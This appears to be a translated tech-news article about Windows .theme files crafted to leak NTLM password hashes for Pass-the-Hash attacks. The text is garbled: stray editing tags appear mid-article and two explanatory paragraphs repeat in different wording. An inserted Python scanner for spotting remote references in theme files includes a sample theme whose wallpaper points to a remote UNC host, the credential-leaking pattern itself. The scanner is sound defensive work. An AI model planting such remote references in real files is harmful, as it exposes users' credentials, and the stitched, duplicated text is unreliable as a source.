They detect a threat that uses "prepared" themes in Windows to steal the access passwords of our computer
Being able to change the look of our computer is one of the things users enjoy most. Changing the desktop's appearance is as easy as downloading and applying a theme, and we have already looked here at the themes and designs that Microsoft, for example, releases periodically in its application store.
"Windows 10 themes and theme packs offer a huge range of options, and almost all of them are safe, especially those released by Microsoft. We say almost all when it comes to security, because a researcher has discovered themes specially crafted to steal our passwords."
Pass-the-Hash Attacks
Themes allow almost any aspect of our desktop to be changed. Colors, backgrounds, icons, cursor... almost everything can be modified by themes that we download or that we customize ourselves. A theme's configuration is stored under the path %AppData%\Microsoft\Windows\Themes as a file with a .theme extension.
"The resulting file, with the .theme extension, can be shared with other users, and this is where the problem discovered by the researcher @bohops, reported on his Twitter account, lies: themes specially packaged to carry out a Pass-the-Hash (PtH) attack against our computers."
These attacks are easy to carry out, so much so that Bleeping Computer reproduced the method and managed to obtain the password without any further complications.
</gre_replace>
<gr_replace lines="9-11" cat="clarify" orig="A type of attack that seeks">
Pass-the-Hash is a type of attack that seeks to steal credentials in order to gain access to other components of the system, with the aim of taking complete control of it and reaching all kinds of information that we store on, and that circulates through, the operating system.
The attacker tries to obtain the login credentials on one computer so that, once obtained, he can authenticate on other computers connected to the network. The goal is to capture the hash values of the password and, with them, gain access to all kinds of services. In this case it is not the plain-text password that is captured but the NTLM hash, which makes the attack easier to carry out.
What this modified .theme file does is change the settings so that the theme has to fetch a resource or a remote file that requires authentication. When Windows tries to access that file remotely, it automatically attempts to log in by sending the NTLM hash and the Windows account username.
A type of attack that seeks to steal credentials in order to gain access to other system components with the aim of gaining total control of it and access to all types of information that we store and that circulate through the operating system.
The attacker tries to access and get the login credentials on the computer so that, once achieved, he can identify himself on other computers connected to the network. It is a question of accessing the hash values of the password and in this way being able to access all kinds of services. In this case, it is not a question of accessing the password in plain text, but rather the NTLM hash, which makes the attack easier to carry out.
In this case, this modified .theme file does is change the settings so that the theme has to search for a resource or a remote file that requires authentication. At that point when you try to access that file remotely, it will automatically try to login by sending the NTLM hash and the Windows account username.
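A defender-side check that follows from the mechanism described above: a .theme file is a plain INI-style text file, so it can be scanned for any value that points at a remote host (a UNC path or a URL) instead of a local file. The following is an added example, not code from the article or from the researcher; the two theme fragments are constructed samples (the 203.0.113.10 address is a documentation range, not a real host), and the function and file names are my own choices.

```python
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed sample: a benign .theme fragment whose wallpaper is a local path.
BENIGN_THEME = """[Theme]
DisplayName=Constructed Local Theme

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
TileWallpaper=0
"""

# Constructed sample: the same fragment with a value that points at a remote host,
# the pattern that makes Windows authenticate to a server it does not control.
SUSPICIOUS_THEME = """[Theme]
DisplayName=Constructed Remote Theme

[Control Panel\\Desktop]
Wallpaper=\\\\203.0.113.10\\share\\wallpaper.jpg
TileWallpaper=0
"""

# A value is "remote" if it names a host: UNC (\\host\share or //host/share)
# or a URL with a non-empty host part. file:///C:/... has an empty host and
# is therefore treated as local.
REMOTE_PATTERNS = [
    re.compile(r"^\\\\[^\\]"),
    re.compile(r"^//[^/]"),
    re.compile(r"^(https?|ftp|file)://[^/]", re.IGNORECASE),
]

Entry = Tuple[str, str, str]  # (section, key, value)


def parse_theme(text: str) -> List[Entry]:
    """Minimal INI parser for .theme files: returns (section, key, value) triples."""
    section = ""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip(), value.strip()))
    return entries


def is_remote_reference(value: str) -> bool:
    """True if the value names a resource on another host."""
    cleaned = value.strip().strip('"')
    return any(pattern.search(cleaned) for pattern in REMOTE_PATTERNS)


def find_remote_references(text: str) -> List[Entry]:
    """Return every (section, key, value) in a theme whose value is remote."""
    return [entry for entry in parse_theme(text) if is_remote_reference(entry[2])]


def scan_theme_files(directory: str) -> Dict[str, List[Entry]]:
    """Scan all *.theme files below a directory; map path -> remote references found."""
    findings: Dict[str, List[Entry]] = {}
    for path in Path(directory).rglob("*.theme"):
        hits = find_remote_references(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        hits = find_remote_references(sample)
        print(f"{name}: {len(hits)} remote reference(s)")
        for section, key, value in hits:
            print(f"  [{section}] {key} = {value}")
```

Pointing scan_theme_files at %AppData%\Microsoft\Windows\Themes (or at a downloads folder before applying anything from it) gives a quick list of theme files that would make Windows reach out to another host; the check is deliberately generic over every key rather than tied to one setting, so it also catches a remote path placed in a field the scanner's author did not think of.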
Given this, the solution recommended by the researcher who discovered the threat is not to download or install files with these extensions, especially when they come from untrustworthy sites. Another, more drastic measure is to block the .theme, .themepack and .desktopthemepackfile file extensions altogether, but then we will no longer be able to change the themes on our computer.
Via | Bleeping Computer